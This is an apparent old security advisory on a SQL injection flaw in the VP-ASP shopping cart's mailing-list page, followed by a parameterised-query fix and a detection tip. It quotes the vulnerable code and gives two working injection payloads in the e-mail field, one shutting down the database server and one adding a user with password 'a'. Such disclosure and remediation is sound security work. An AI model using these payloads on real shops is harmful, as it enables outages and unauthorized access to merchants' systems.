************************************************** !!! WARNING !!! ***********************************************************
* FOR EDUCATIONAL PURPOSES ONLY! *
******************************************************************************************************************************
Neither myself nor any of my Affiliates shall be liable for any direct, incidental, consequential, indirect or punitive damages arising out of access to, inability to access, or any use of the content of this advisory, including without limitation any PC, other equipment or other property, even if I am expressly advised of the possibility of such damages. I DO NOT encourage criminal activities. If you use this advisory or commit criminal acts with it, then you are solely responsible for your own actions, and by use, downloading, transferring, and/or reading anything from this advisory you are considered to have accepted the terms and conditions and to have read this disclaimer. Once again, this advisory is for educational purposes only.
******************************************************************************************************************************
* PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE *

VP-ASP x.x.x shopmaillist.asp SQL Injection (TESTED ON 5.xx/6.00>?) discovered by tracewar (tracewar@gmail.com).
The SQL injection exists in the UpdateCustomer procedure (VBScript, shopmaillist.asp). Note that only the last name is escaped before it is concatenated into the query; the e-mail address is not:

    Sub UpdateCustomer
        If getconfig("xMYSQL") = "Yes" Then
            MYSQLMaillistUpdateCustomer
            Exit Sub
        End If
        Dim dbc, whereok
        Dim doupdate, templastname
        OpenCustomerDb dbc
        Set objRS = Server.CreateObject("ADODB.Recordset")
        ' Single quotes in the last name are doubled, so this value is safe
        templastname = Replace(strlastname, "'", "''")
        SQL = "SELECT * FROM " & dbtable & " WHERE "
        whereok = ""
        SQL = SQL & whereok & " LastName='" & templastname & "'"
        whereok = " AND "
        ' stremail is concatenated as-is: this is the injection point
        SQL = SQL & whereok & " email='" & stremail & "'"
        objRS.Open SQL, dbc, adOpenKeyset, adLockOptimistic, adCmdText
        'debugwrite sql
        If Not objRS.EOF Then
            doupdate = "True"
        Else
            objRS.Close
            Set objRS = Nothing
        End If
        If doupdate = "" Then
            ' No matching subscriber: open the table directly and add a row
            Set objRS = Server.CreateObject("ADODB.Recordset")
            objRS.Open dbtable, dbc, adOpenKeyset, adLockOptimistic, adCmdTable
            objRS.AddNew
        End If
        Updateminimuminfo objRS
        CloseRecordset objRS
        ShopCloseDatabase dbc
    End Sub

If you keep tracking the code you will notice that the "stremail" value is never checked properly for SQL injection before UpdateCustomer runs (fragment of the calling code):

    Else
        ValidateData()
        If sError = "" Then
            If unsubscribe = "" Then
                UpdateCustomer
                SendMailToMerchant LangMailListRegistration
                WriteInfo

The ValidateData() procedure is totally useless as a defence; it only checks that the fields are non-empty:

    Sub ValidateData
        strFirstname = Request.Form("strFirstname")
        strLastname = Request.Form("strLastname")
        strEmail = Request.Form("strEmail")
        unsubscribe = Request("blnmaillist")
        ValidateMininumInfo
    End Sub

    Sub ValidateMininumInfo
        BlnMailList = True
        If strLastname = "" Then
            sError = sError & LangCustLastname & LangCustRequired & "<br>"
        End If
        If strEmail = "" Then
            sError = sError & LangCustEmail & LangCustRequired & "<br>"
        Else
            CustomerValidateEmail strEmail
        End If
    End Sub

    Sub CustomerValidateEmail(strEmail)
        ' The only "validation": an @ must appear somewhere after the first character
        If Not InStr(strEmail, "@") > 1 Then
            sError = sError & LangInvalidEmail & "<br>"
        End If
    End Sub

So the e-mail value only has to contain an @ (the whole check is InStr(strEmail, "@") > 1) in order to pass the useless CustomerValidateEmail procedure. Oh, and this is also the reason why SQL injection scanners didn't detect this injection earlier (HMPF HMPF *TIP* :P).

Quick hack: write this as email: JUNK@';shutdown-- in order to shut down the SQL server.

Write this as email: asdsadd@asdd.com';insert into tbluser ('fldusername','fldpassword','fldaccess') values ('a','a')-- in order to add user 'a' with password 'a'.

THE END.

* PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE *
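The fix for the flaw described above, as an added example written for this page and not VP-ASP's own code: the lookup is rewritten with ADO command parameters so that the e-mail address is sent to the database as data rather than spliced into the statement, and the e-mail check is replaced by a whitelist pattern. It assumes the VP-ASP helpers and globals the original procedure already uses (OpenCustomerDb, Updateminimuminfo, CloseRecordset, ShopCloseDatabase, dbtable, strLastname, strEmail, sError, LangInvalidEmail) and the ADO constants from adovbs.inc; the procedure names CustomerValidateEmailStrict and UpdateCustomerSafe are hypothetical.

```vbscript
' Added example, not VP-ASP code. Assumes VP-ASP's existing helpers/globals
' (OpenCustomerDb, Updateminimuminfo, CloseRecordset, ShopCloseDatabase,
' dbtable, strLastname, strEmail, sError, LangInvalidEmail) and adovbs.inc.

Sub CustomerValidateEmailStrict(strEmail)
    ' Whitelist a conservative address shape. Quotes, semicolons, spaces and
    ' comment markers are simply not in the allowed character set, so a value
    ' such as  JUNK@';shutdown--  is rejected before any SQL is built.
    Dim re
    Set re = New RegExp
    re.Pattern = "^[A-Za-z0-9._%+\-]+@[A-Za-z0-9\-]+(\.[A-Za-z0-9\-]+)*\.[A-Za-z]{2,}$"
    re.IgnoreCase = False
    If Len(strEmail) > 254 Or Not re.Test(strEmail) Then
        sError = sError & LangInvalidEmail & "<br>"
    End If
End Sub

Sub UpdateCustomerSafe
    Dim dbc, cmd, objRS
    OpenCustomerDb dbc

    ' Placeholders instead of concatenation: the driver transmits the two values
    ' separately from the statement text, so a quote inside strEmail is only a
    ' character to compare against, never part of the SQL. This also removes
    ' the need for the hand-rolled Replace("'", "''") on the last name.
    ' dbtable is a table name from VP-ASP's configuration, not request input;
    ' identifiers cannot be parameterised, which is why it is still concatenated.
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = dbc
    cmd.CommandType = adCmdText
    cmd.CommandText = "SELECT * FROM " & dbtable & " WHERE LastName = ? AND email = ?"
    cmd.Parameters.Append cmd.CreateParameter("LastName", adVarChar, adParamInput, 255, strLastname)
    cmd.Parameters.Append cmd.CreateParameter("email", adVarChar, adParamInput, 255, strEmail)

    ' Open an updatable keyset recordset over the command (the connection comes
    ' from the command, so the ActiveConnection argument is left empty) so that
    ' Updateminimuminfo can still write to an existing row.
    Set objRS = Server.CreateObject("ADODB.Recordset")
    objRS.Open cmd, , adOpenKeyset, adLockOptimistic

    If objRS.EOF Then
        ' No existing subscriber: switch to a table recordset and add a row,
        ' mirroring the original procedure's insert path.
        objRS.Close
        objRS.Open dbtable, dbc, adOpenKeyset, adLockOptimistic, adCmdTable
        objRS.AddNew
    End If

    Updateminimuminfo objRS
    CloseRecordset objRS
    ShopCloseDatabase dbc
End Sub
```

Both halves matter: the parameterised query is what actually closes the injection, and the stricter validation is defence in depth that also gives the merchant a clean error instead of a database error when someone submits a malformed address. A practitioner checking a VP-ASP install for this bug can grep shopmaillist.asp for the string `" email='" & stremail` shown in the original procedure; its presence means the unparameterised lookup is still in place.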